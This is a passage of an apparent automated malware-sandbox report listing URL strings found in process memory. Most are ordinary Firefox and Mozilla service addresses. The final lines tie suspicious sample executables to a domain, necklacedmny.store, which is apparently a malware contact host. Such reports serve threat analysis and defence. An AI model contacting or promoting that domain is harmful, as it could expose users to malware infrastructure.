Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUsi
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2764741953.000001C1745F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000003.2683990291.000001C175A58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2683314621.000001C175A4A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001B.00000002.2773435274.000001C174730000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsPleas
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MOZ_GOOGLE_LOCATION_SERVICE_API_KEY
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MOZ_GOOGLE_LOCATION_SERVICE_API_KEYParent
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171937000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000020.00000002.2722359273.000002B79702F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001B.00000002.2754695951.000001C171C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsinternal:svgContextPropertiesAllowed/shims/google-ana
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881BaseCont
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001B.00000003.2680870116.000001C1770FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001B.00000002.2754695951.000001C171C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sbrowser.download.viewableInternally.enabledTypesMu
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sScheme
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000020.00000002.2722359273.000002B797086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2744766730.000001C170CD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: file.exe, 00000000.00000003.1845555563.000000000115F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store
Source: 6cadd3f0fd.exe, 00000009.00000003.2731093184.0000000000778000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2689945232.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/9Sbqj
Source: 6cadd3f0fd.exe, 00000009.00000003.2556995492.000000000077E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/H
Source: 6cadd3f0fd.exe, 0000000D.00000003.2689945232.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/X
